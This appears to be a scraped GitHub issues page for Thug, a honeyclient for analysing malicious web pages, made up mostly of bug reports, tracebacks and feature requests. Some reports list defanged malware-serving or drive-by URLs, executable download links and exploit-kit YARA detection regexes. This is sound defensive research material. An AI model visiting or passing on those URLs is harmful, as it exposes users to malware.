buffer / thug Goto Github PK

Saw this on a landing page, thug did not follow it:

<script type="text/javascript">
    setTimeout("testTime()", 0);
    function testTime() {
        location = "/";
    }
 </script>

http://www.lzjlts[DOT]com/14/8/93562608.html

Keeps looping:

[HTTP] URL: http://js.users.51[DOT]la/9466579.js (Status: 200, Referrer: http://www.lzjlts[DOT]com/14/8/93562608.html)

http://backyardbiteDOTcom/

TypeError: Cannot call method 'split' of null ( @ 4 : 68 ) -> n>0;k++){h=[],j=i[k];for(m=0;m<n;m++){g=f[m],~b.indexOf(g.className.split(" ")

Traceback (most recent call last):
  File "multloop.py", line 10, in worker
    thug.Thug((url,))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 707, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 669, in _run
    if not self.do_handle(child):
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 647, in do_handle
    handler(child)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 411, in handle_script
    handler(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 438, in handle_javascript
    self.handle_external_javascript(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 430, in handle_external_javascript
    self.window.evalScript(js, tag = script)
  File "/home/ubuntu/thug/src/DOM/Window.py", line 768, in evalScript
    result    = shellcode.run()
  File "/home/ubuntu/thug/src/Debugger/Shellcode.py", line 104, in run
    result = self.ctxt.eval(self.script.decode(enc['encoding']))
TypeError: TypeError: Cannot call method 'split' of null (  @ 4 : 68 )  -> n>0;k++){h=[],j=i[k];for(m=0;m<n;m++){g=f[m],~b.indexOf(g.className.split(" ")

Its not really a Thug issue, but I am unable to get PyV8 installed on my system. Can some one help me out.

I am using Ubuntu 12.04 with Python 2.7.3 and just installed the Boost library using apt-get (version: 1.48.0.2)

I followed the instructions on the Thug homepage for installing PyV8. But when I run (with $V8_HOME setup), the setup script seems to ignore that and checkout another copy of V8. So, instead I filled up the buildconf.py file (only the V8_HOME, PYTHON_HOME and BOOST_HOME, leaving others as default in the buildconf.py.example file).

Then, when I run python setup.py build in pyv8 directory, I end up with a error message like this:

In file included from src/Engine.cpp:12:0:
src/AST.h: In member function ‘int CAstStatement::GetPosition() const’:
src/AST.h:182:62: error: ‘class v8::internal::Statement’ has no member named ‘statement_pos’
src/AST.h: In member function ‘void CAstStatement::SetPosition(int)’:
src/AST.h:183:53: error: ‘class v8::internal::Statement’ has no member named ‘set_statement_pos’
src/AST.h: In member function ‘int CAstDoWhileStatement::GetConditionPosition()’:
src/AST.h:337:72: error: ‘class v8::internal::DoWhileStatement’ has no member named ‘condition_position’
src/AST.h: In member function ‘void CAstDoWhileStatement::SetConditionPosition(int)’:
src/AST.h:338:69: error: ‘class v8::internal::DoWhileStatement’ has no member named ‘set_condition_position’
src/AST.h: In member function ‘int CAstConditional::then_expression_position() const’:
src/AST.h:687:77: error: ‘class v8::internal::Conditional’ has no member named ‘then_expression_position’
src/AST.h: In member function ‘int CAstConditional::else_expression_position() const’:
src/AST.h:688:77: error: ‘class v8::internal::Conditional’ has no member named ‘else_expression_position’
error: command 'gcc' failed with exit status 1

ttp://fs165.www.exDOTua/get/654139898931/0b8e131e608f2234f5db9df4cca509bf/31438929/Anti-Cheat.exe

ReferenceError: initBody is not defined ( @ 1 : 68 ) -> ument) { with(this.form || {}) { with(this) { event = window.event; initBody()

Traceback (most recent call last):
  File "multloop.py", line 10, in worker
    thug.Thug((url,))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 707, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 669, in _run
    if not self.do_handle(child):
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 647, in do_handle
    handler(child)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 599, in handle_iframe
    self.handle_frame(iframe, 'iframe')
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 596, in handle_frame
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 707, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 697, in _run
    self.handle_window_event(evt)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 291, in handle_window_event
    handler()
ReferenceError: ReferenceError: initBody is not defined (  @ 1 : 68 )  -> ument) { with(this.form || {}) { with(this) { event = window.event; initBody()

I tried submitting this as a patch but, bad luck for me, a new git user.

Please refer:
https://github.com/codevi/thug/commit/42b552c0cce18dcedf25628496e674b0d2da36ce

http://www.windows-7-themes[DOT]com/site_tempfiles/07/stargate.exe=0D=0Ahttp:/221.143.46.79/1315.exe=

Causes Thug to loop quite a while. Seems like:

http://pagead2.googlesyndication[DOT]com/pagead/render_ads.js

is responsible.

I am a Newbie, I got assignment to implement this honeyClient Thug.

I have installed all the requirements and then run it.

and the result is:

kafin@ubuntu:$ cd thug/src
kafin@ubuntu:/thug/src$ sudo python thug.py -v "hxxp://myapp-ups.com/main.php?page=898e350e1897a478"
[sudo] password for kafin:
[2012-10-11 02:09:48] [MongoDB] MongoDB instance not available
[2012-10-11 02:09:49] Saving log analysis at ../logs/d870c1d112834149d95306ab149ffab9/20121011020948
kafin@ubuntu:~/thug/src$

is that actually running as it should be or properly?

and it logs the analysis.xml.. how should i maintain that analysis?
how to observe that result?

or can you tell how to deal with this thug? or the documentation?

That's all that I ask, Your response will be very useful for me..

Thank You.

encountered on this webpage: http :// shp-n . com/tr/index.aspx?id=ef418fe7aa6d68fa734c1efaad869f830c3239f4362d9d2600c4d4c9332fbc6bd4a5fc1aaa79471b

Traceback (most recent call last):
  File "./thug.py", line 473, in <module>
    Thug(sys.argv[1:])()
  File "./thug.py", line 279, in __call__
    self.analyze()
  File "./thug.py", line 465, in analyze
    p(args[0])
  File "./thug.py", line 359, in run_remote
    self.run(window)
  File "./thug.py", line 335, in run
    dft.run()
  File "thug/src/DOM/DFT.py", line 939, in run
    self._run()
  File "thug/src/DOM/DFT.py", line 929, in _run
    self.handle_window_event(evt)
  File "thug/src/DOM/DFT.py", line 295, in handle_window_event
    handler()
TypeError: TypeError: Cannot call method 'submit' of undefined (  @ 9 : 27 )  ->             document.A7Hit.submit();

Hi,

according to the yara documentation, regexes in the yara language should be perl-compatible.

In the signatures distributed with thug however in some signatures dots are not escaped.
Take for instance Styx_6 with the regex //[a-zA-Z0-9]{40,}/[a-zA-Z0-9]{4,10}.exe/ (what is interesting here is the part .exe)

In the perl syntax a dot stands for a single arbitrary character, hence this regex matches to strings containing ".exe" but also for instance to "aexe" or "bexe". Other families affected include Redkit, SweetOrange and more.

Crimeboss_1 for instance seems to be OK: /.php?x=s&\w+=\d+&no=\d/ (I just noticed that the leading backslash is not displayed here, but it is there ;) )

Am I missing something or is this a bug?

window.navigate() is sometimes used to redirect the browser and is not handled by Thug. I fixed it in my version by adding the following code to DOM/Window.

def navigate(self, location):
self.setLocation(location)

Example Javascript :

Stack Trace :

Traceback (most recent call last):
File "/home/sduquette/thug/src/thug.py", line 323, in
Thug(sys.argv[1:])()
File "/home/sduquette/thug/src/thug.py", line 170, in call
self.analyze()
File "/home/sduquette/thug/src/thug.py", line 316, in analyze
p(args[0])
File "/home/sduquette/thug/src/thug.py", line 218, in run_local
self.run(window)
File "/home/sduquette/thug/src/thug.py", line 208, in run
dft.run()
File "/home/sduquette/thug/src/DOM/DFT.py", line 731, in run
self._run()
File "/home/sduquette/thug/src/DOM/DFT.py", line 693, in _run
if not self.do_handle(child):
File "/home/sduquette/thug/src/DOM/DFT.py", line 671, in do_handle
handler(child)
File "/home/sduquette/thug/src/DOM/DFT.py", line 412, in handle_script
handler(script)
File "/home/sduquette/thug/src/DOM/DFT.py", line 461, in handle_javascript
self.handle_external_javascript(script)
File "/home/sduquette/thug/src/DOM/DFT.py", line 453, in handle_external_javascript
self.window.evalScript(js, tag = script)
File "/home/sduquette/thug/src/DOM/Window.py", line 768, in evalScript
result = shellcode.run()
File "/home/sduquette/thug/src/Debugger/Shellcode.py", line 104, in run
result = self.ctxt.eval(self.script.decode(enc['encoding']))
TypeError: TypeError: Object [object Window] has no method 'navigate' ( @ 6 : 8 ) -> window.navigate("default.htm");

This URL causes something that looks like an iframe loop:

http://dd1.adsxp[DOT]net/6dd/

URL = http://storify[DOT]com/nfl20122013/dallas-cowboys-vs-st-louis-rams-live-streaming-onl

[2012-08-28 12:53:13] [HTTP] URL: https://c91490a034759f49d23a-487a6be5fd6a54f1098a450cd120f953.ssl.cf2.rackcdn[DOT]com/1.10.2-production-c81110f0-38dc1de368004b4ee3da19a3f1edc7e8.js (Status: 200, Referrer: http://storify[DOT]com/nfl20122013/dallas-cowboys-vs-st-louis-rams-live-streaming-onl)
[2012-08-28 12:53:16] ActiveXObject: microsoft.xmlhttp

Traceback (most recent call last):
  File "looper.py", line 14, in <module>
    thug.Thug((url.strip(),))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 648, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 632, in _run
    handler(child)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 386, in handle_script
    handler(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 413, in handle_javascript
    self.handle_external_javascript(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 405, in handle_external_javascript
    self.window.evalScript(js, tag = script)
  File "/home/ubuntu/thug/src/DOM/Window.py", line 767, in evalScript
    result    = shellcode.run()
  File "/home/ubuntu/thug/src/Debugger/Shellcode.py", line 80, in run
    result = self.ctxt.eval(self.script.decode(enc['encoding']))
TypeError: TypeError: Cannot call method 'detectLanguage' of undefined (  @ 1 : 68 )  -> ndow.s||{},{sources:{},pages:{}}),t=function(){},moment.lang($.i18n.detectLang

1. Loop Detection - detect a loop in the request chain and exit out after N trips through the loop. Ideally this would detect multi-page loops, but even just detecting the same page redirecting to itself would be a good start
2. Handle ^C - Right now ^C events seem to be ignored, making a more nasty kill signal the only option to stop thug stuck in a loop. It would be nice to trap the ^C signal and nicely tear down the session (saving off the avlog.json/analysis.xml etc. on the way out)

Full output pasted below. I'm running this on the latest version of REMnux.

remnux@remnux:~/thug/src$ python thug.py [site redacted][2013-07-03 11:51:26] [window open redirection] about:blank -> [site redacted]
[2013-07-03 11:51:33] [HTTP] URL: [site redacted](Status: 200, Referrer: None)
[2013-07-03 11:51:33] [HTTP] URL: [site redacted][site redacted](Content-type: text/html, MD5: 9fe938b13a51a55f8cfc5ee1937a96f5)
Traceback (most recent call last):
File "thug.py", line 202, in
Thug(sys.argv[1:])()
File "/home/remnux/thug/src/ThugAPI/ThugAPI.py", line 61, in call
self.analyze()
File "thug.py", line 193, in analyze
p(args[0])
File "/home/remnux/thug/src/ThugAPI/ThugAPI.py", line 203, in run_remote
self.run(window)
File "/home/remnux/thug/src/ThugAPI/ThugAPI.py", line 179, in run
dft.run()
File "/home/remnux/thug/src/DOM/DFT.py", line 1059, in run
self._run()
File "/home/remnux/thug/src/DOM/DFT.py", line 1012, in _run
if not self.do_handle(child):
File "/home/remnux/thug/src/DOM/DFT.py", line 990, in do_handle
handler(child)
File "/home/remnux/thug/src/DOM/DFT.py", line 904, in handle_style
cssparser = CSSParser(loglevel = logging.CRITICAL, validate = False)
TypeError: init() got an unexpected keyword argument 'validate'

http://www.baiduDOTcom/s?wd=%EC%B6%FE%C8%A9%D1%AC%CF%E4%BD%F0%BF%CF%D4%EC&rsv_bp=0&rsv_spt=3&inputT=21571

TypeError: Object [object DOMImplementation] has no method 'createStyleSheet' ( @ 1 : 68 ) -> username-1.2.html",addStyle:function(b){if(baidu.ie){var d=document.createStyl

Traceback (most recent call last):
  File "multloop.py", line 10, in worker
    thug.Thug((url,))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 707, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 669, in _run
    if not self.do_handle(child):
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 647, in do_handle
    handler(child)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 411, in handle_script
    handler(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 438, in handle_javascript
    self.handle_external_javascript(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 430, in handle_external_javascript
    self.window.evalScript(js, tag = script)
  File "/home/ubuntu/thug/src/DOM/Window.py", line 768, in evalScript
    result    = shellcode.run()
  File "/home/ubuntu/thug/src/Debugger/Shellcode.py", line 104, in run
    result = self.ctxt.eval(self.script.decode(enc['encoding']))
TypeError: TypeError: Object [object DOMImplementation] has no method 'createStyleSheet' (  @ 1 : 68 )  -> username-1.2.html",addStyle:function(b){if(baidu.ie){var d=document.createStyl

Apologies if this isn't a bug - but it sure looks like one!

root@ip-<removed>:/opt/thug/src# python thug.py  http://google.com
[2012-07-26 19:27:22] [HTTP Redirection (Status: 301)] Content-Location: http://google.com --> Location: http://www.google.com/
[2012-07-26 19:27:22] [HTTP] URL: http://google.com (Status: 200, Referrer: None)
[2012-07-26 19:27:22] <meta content="text/html; charset=utf-8" http-equiv="content-type"/>
[2012-07-26 19:27:22] <meta content="/images/google_favicon_128.png" itemprop="image"/>
[2012-07-26 19:29:07] [WARNING] Error while dispatching click event
[2012-07-26 19:30:50] [WARNING] Error while dispatching click event
[2012-07-26 19:30:50] [WARNING] Error while dispatching click event
[2012-07-26 19:30:50] Saving log analysis at ../logs/c7b920f57e553df2bb68272f61570210/20120726192722

I can provide the logs if necessary. This is using Thug 0.4.6

Currently crashes on TLDs with Unicode:

thug@thug:~/Desktop/thug/src$ python thug.py -p http://proxy:3128 http://www.крамерр.рф/
[2013-03-12 12:33:20] [window open redirection] about:blank -> http://www.крамерр.рф/
[2013-03-12 12:33:20] [HTTP] URL: http://www.крамерр.рф/ (Status: 400, Referrer: None)
[2013-03-12 12:33:20] Saving log analysis at ../logs/ebe55bbc8a21f7a0d6ce09a7b2c75970/20130312123320
Traceback (most recent call last):
  File "thug.py", line 473, in <module>
    Thug(sys.argv[1:])()
  File "thug.py", line 279, in __call__
    self.analyze()
  File "thug.py", line 468, in analyze
    log.ThugLogging.log_event()
  File "/home/thug/Desktop/thug/src/Logging/ThugLogging.py", line 73, in log_event
    self.MAEC.export(outfile = fd)
  File "/home/thug/Desktop/thug/src/Logging/MAEC.py", line 249, in export
    namespacedef_ = NAMESPACEDEF_)
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 232, in export
    self.exportChildren(outfile, level + 1, namespace_, name_)
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 242, in exportChildren
    self.Analyses.export(outfile, level, namespace_, name_='Analyses')
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 358, in export
    self.exportChildren(outfile, level + 1, namespace_, name_)
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 367, in exportChildren
    Analysis_.export(outfile, level, namespace_, name_='Analysis')
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 12911, in export
    self.exportChildren(outfile, level + 1, namespace_, name_)
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 12928, in exportChildren
    Subject_.export(outfile, level, namespace_, name_='Subject')
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 13108, in export
    self.exportChildren(outfile, level + 1, namespace_, name_)
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 13122, in exportChildren
    self.Object.export(outfile, level, namespace_, name_='Object')
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 3233, in export
    self.exportAttributes(outfile, level, namespace_, name_='ObjectType')
  File "/home/thug/Desktop/thug/src/Logging/MAEC_v1_1.py", line 3243, in exportAttributes
    outfile.write(' object_name=%s' % (self.format_string(quote_attrib(self.object_name).encode(ExternalEncoding), input_name='object_name'), ))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xd0 in position 12: ordinal not in range(128)

http://www.tecnosferDOTit/

ReferenceError: initLightbox is not defined ( @ 1 : 68 ) -> ument) { with(this.form || {}) { with(this) { event = window.event; initLightb

Traceback (most recent call last):
  File "multloop.py", line 10, in worker
    thug.Thug((url,))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 707, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 697, in _run
    self.handle_window_event(evt)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 291, in handle_window_event
    handler()
ReferenceError: ReferenceError: initLightbox is not defined (  @ 1 : 68 )  -> ument) { with(this.form || {}) { with(this) { event = window.event; initLightb

`[2013-04-17 11:42:18] [HTTP] URL: http://munchkin.marketo.net/munchkin.js (Content-type: application/javascript, MD5: 87d214019362fcd1e8aaa3bff448d466)
[2013-04-17 11:42:25]
[2013-04-17 11:42:25] Traceback (most recent call last):
File "/Users/bryan/work/thug/src/Debugger/Shellcode.py", line 100, in run
result = self.ctxt.eval(self.script)
KeyError: 'value'

Traceback (most recent call last):
File "./thug.py", line 202, in
Thug(sys.argv[1:])()
File "/Users/bryan/work/thug/src/ThugAPI/ThugAPI.py", line 61, in call
self.analyze()
File "./thug.py", line 193, in analyze
p(args[0])
File "/Users/bryan/work/thug/src/ThugAPI/ThugAPI.py", line 203, in run_remote
self.run(window)
File "/Users/bryan/work/thug/src/ThugAPI/ThugAPI.py", line 179, in run
dft.run()
File "/Users/bryan/work/thug/src/DOM/DFT.py", line 956, in run
self._run()
File "/Users/bryan/work/thug/src/DOM/DFT.py", line 946, in _run
self.handle_window_event(evt)
File "/Users/bryan/work/thug/src/DOM/DFT.py", line 301, in handle_window_event
handler()
TypeError: TypeError: Property 'createDocumentFragment' of object [object Object] is not a function ( @ 12 : 68 ) -> :function(J,M,L){if(this[0]){var I=(this[0].ownerDocument||this[0]).createDocu`

Looks like input url needed to be encoded for processing:
Eg. http://site.com/example .html - return 404, http://site.com/example%20.html - works. When this path included in the urls on the page I can do nothing with it.

I found that this document with a DOCTYPE line doesn't include the refered test.js file

http://pastebin.com/aQvKZSZH

Sorry for the link but I couldn't include the text here without escaping the HTML

http://down.byfen[DOT]com/Game/GameJarFile.wml?FileId=44527&Mid=1584&Wap_Type=WAP2

[2012-08-28 12:31:10] [HTTP] URL: http://down.byfen[DOT]com/Game/GameJarFile.wml?FileId=44527&Mid=1584&Wap_Type=WAP2 (Status: 200, Referrer: None)
[2012-08-28 12:31:10] [HTTP Redirection (Status: 302)] Content-Location: http://down.byfen[DOT]com/Game/GameJarFile.wml?FileId=44527&Mid=1584&Wap_Type=WAP2 --> Location: http://down.byfen[DOT]com/Game/2/1342/fengshenbang_2_e62.jar
[2012-08-28 12:31:10] [MIMEHandler] Unknown MIME Type: application/java-archive

1. Check page with embedded external iframe on it like this one:
   iframe src="hxxp://10.8.5.60:8080/" height="0" width="0" frameboarder="0" scrolling="no"
2. Visiting iframe jar file detetected:

[2013-11-07 11:35:07] [HTTP] URL: http://10.8.5.60:8080/ (Content-type: text/html, MD5: d81a21ab9debe45881f718df3512d5e0)
[2013-11-07 11:35:07]

[2013-11-07 11:35:07] [Navigator URL Translation] /Siteloader.jar --> http://10.8.4.60/Siteloader.jar
[2013-11-07 11:35:07] [applet redirection] http://10.8.4.60/test/iframe2.html -> http://10.8.4.60/Siteloader.jar
[2013-11-07 11:35:07] [HTTP] URL: http://10.8.4.60/Siteloader.jar (Status: 404, Referrer: http://10.8.4.60/test/iframe2.html)

==> 'File Not Found' because of wrong substitution of base url.

There is the option -o -v -d and -a which all effect the output of the logging but there is no option to suppress it where for example you use the -o option but don't want to have the output on the console. Would be nice to have this.

http://uploads.boxifyDOTme/88915/mda.bmp

'ascii' codec can't encode characters in position 1-2: ordinal not in range(128)

Traceback (most recent call last):
  File "multloop.py", line 10, in worker
    thug.Thug((url,))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 707, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 669, in _run
    if not self.do_handle(child):
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 645, in do_handle
    handler = getattr(self, "handle_%s" % (str(name.lower()), ), None)
UnicodeEncodeError: 'ascii' codec can't encode characters in position 1-2: ordinal not in range(128)

While analyzing certain CSS elements, shellcode analysis takes plenty of time & causes memory to exhaust & finally crash.
Please use:

jului[dot]com[dot]br/loja/product_reviews_info[dot]php

This works fine with earlier versions of Thug posssibly, before the JSBeautifier requirement.

File "/home/xxx/thug/DOM/DFT.py", line 302, in handle_window_event
handler()
TypeError: TypeError: 'NoneType' object is not callable ( @ 4 : 68 ) -> "emoveChild(h[j]):h[j]);else{if(h[j].nodeType===1){var s=f.grep(h[j].getElement"

Is there a personal mailbox I can provide you with the URL?

Error being obtained when using document.all.tags()
URL: http://teamsupportDOTaqDOTpl/index.html (Caution: this is a drive-by URL!!)

[2013-11-25 23:01:06] Traceback (most recent call last):
  File "/home/phani/thug/src/Debugger/Shellcode.py", line 100, in run
    result = self.ctxt.eval(self.script)
TypeError: TypeError: Object [object Object] has no method 'tags' (  @ 1 : 68 )  -> AllByTag=function(n){var objs=[];if(document.a
ll){objs=document.all.tags(n)}el

checkout_v8 function isn't commented out in setup script. providing a patch file and applying it might be a good solution ?

Cheers,

Currently I can't find a way for thug to display it's version number except looking into the source code. Maybe a -V --version option would be good here.

[2012-08-27 10:21:54] [MIMEHandler] Unknown MIME Type: application/x-msdos-program

Traceback (most recent call last):
  File "thug_loop.py", line 20, in <module>
    thug.Thug(url)()
  File "/opt/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/opt/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/opt/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/opt/thug/src/thug.py", line 208, in run
    dft.run()
  File "/opt/thug/src/DOM/DFT.py", line 649, in run
    self._run()
  File "/opt/thug/src/DOM/DFT.py", line 631, in _run
    handler = getattr(self, "handle_%s" % (str(name), ), None)
UnicodeEncodeError: 'ascii' codec can't encode characters in position 2-4: ordinal not in range(128)

Maybe make the encoding ignoring errors?

http://suncomputech.coDOTin/downloadcatalog.html

ReferenceError: preloadImages is not defined ( @ 1 : 68 ) -> ument) { with(this.form || {}) { with(this) { event = window.event; preloadIma

Traceback (most recent call last):
  File "multloop.py", line 10, in worker
    thug.Thug((url,))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 707, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 697, in _run
    self.handle_window_event(evt)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 291, in handle_window_event
    handler()
ReferenceError: ReferenceError: preloadImages is not defined (  @ 1 : 68 )  -> ument) { with(this.form || {}) { with(this) { event = window.event; preloadIma

When trying -n|--logdir using 0.4.17, I receive the following:

Traceback (most recent call last):
File "thug.py", line 421, in
Thug(sys.argv[1:])()
File "thug.py", line 240, in call
self.analyze()
File "thug.py", line 367, in analyze
log.ThugLogging.set_absbasedir(option[1])
AttributeError: 'Logger' object has no attribute 'ThugLogging'

When running python thug.py -u winxpie80 http://verizon.com, I get the following errors. Running latest code from the master branch on Ubuntu 13.04.

[2013-08-06 18:54:00] Traceback (most recent call last):
  File "/home/thug/Desktop/thug/src/Debugger/Shellcode.py", line 100, in run
    result = self.ctxt.eval(self.script)
ReferenceError: ReferenceError: dc is not defined (  @ 76 : 21 )  ->     var x = unescape(dc.substring(begin + prefix.length, end));

[2013-08-06 18:54:03] Traceback (most recent call last):
  File "/home/thug/Desktop/thug/src/Debugger/Shellcode.py", line 100, in run
    result = self.ctxt.eval(self.script)
TypeError: TypeError: Object function Class(b){if(b instanceof Function){b={initialize:b};}var a=function(){Object.reset(this);if(a._prototyping){return this;}this._current=$empty;var c=(this.initialize)?this.initialize.apply(this,arguments):this;delete this._current;delete this.caller;return c;}.extend(this);a.implement(b);a.constructor=Class;a.prototype.constructor=a;return a;} has no method 'extend' (  @ 6 : 68 )  -> a[c]);break;}return a;};new Native({name:"Class",initialize:Class}).extend({in

[2013-08-06 18:54:04] Traceback (most recent call last):
  File "/home/thug/Desktop/thug/src/Debugger/Shellcode.py", line 100, in run
    result = self.ctxt.eval(self.script)
TypeError: TypeError: Object function Class(b){if(b instanceof Function){b={initialize:b};}var a=function(){Object.reset(this);if(a._prototyping){return this;}this._current=$empty;var c=(this.initialize)?this.initialize.apply(this,arguments):this;delete this._current;delete this.caller;return c;}.extend(this);a.implement(b);a.constructor=Class;a.prototype.constructor=a;return a;} has no method 'extend' (  @ 6 : 68 )  -> a[c]);break;}return a;};new Native({name:"Class",initialize:Class}).extend({in

[2013-08-06 18:54:07] Traceback (most recent call last):
  File "/home/thug/Desktop/thug/src/Debugger/Shellcode.py", line 100, in run
    result = self.ctxt.eval(self.script)
TypeError: TypeError: Object function (){Object.reset(this);if(a._prototyping){return this;}this._current=$empty;var c=(this.initialize)?this.initialize.apply(this,arguments):this;delete this._current;delete this.caller;return c;} has no method 'extend' (  @ 6 : 68 )  -> ,arguments):this;delete this._current;delete this.caller;return c;}.extend(thi

After this final error, processing continues a few more seconds, then Python segfaults (unsure whether this is related).

http://sociedadevipseridoDOTcom/

TypeError: Property 'createDocumentFragment' of object object is not a function ( @ 12 : 68 ) -> :function(J,M,L){if(this[0]){var I=(this[0].ownerDocument||this[0]).createDocu

Traceback (most recent call last):
  File "multloop.py", line 10, in worker
    thug.Thug((url,))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 707, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 697, in _run
    self.handle_window_event(evt)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 291, in handle_window_event
    handler()
TypeError: TypeError: Property 'createDocumentFragment' of object object is not a function (  @ 12 : 68 )  -> :function(J,M,L){if(this[0]){var I=(this[0].ownerDocument||this[0]).createDocu

URL = http://www.hunan-zhenghong.com[DOT]cn/fucai3dyuce/201207/399148.html

[2012-08-28 13:22:29] [HTTP] URL: http://www.hunan-zhenghong.com[DOT]cn/js/duilian.js (Status: 200, Referrer: http://www.hunan-zhenghong.com[DOT]cn/fucai3dyuce/201207/399148.html)

Traceback (most recent call last):
  File "looper.py", line 14, in <module>
    thug.Thug((url.strip(),))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 648, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 632, in _run
    handler(child)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 386, in handle_script
    handler(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 413, in handle_javascript
    self.handle_external_javascript(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 405, in handle_external_javascript
    self.window.evalScript(js, tag = script)
  File "/home/ubuntu/thug/src/DOM/Window.py", line 767, in evalScript
    result    = shellcode.run()
  File "/home/ubuntu/thug/src/Debugger/Shellcode.py", line 80, in run
    result = self.ctxt.eval(self.script.decode(enc['encoding']))
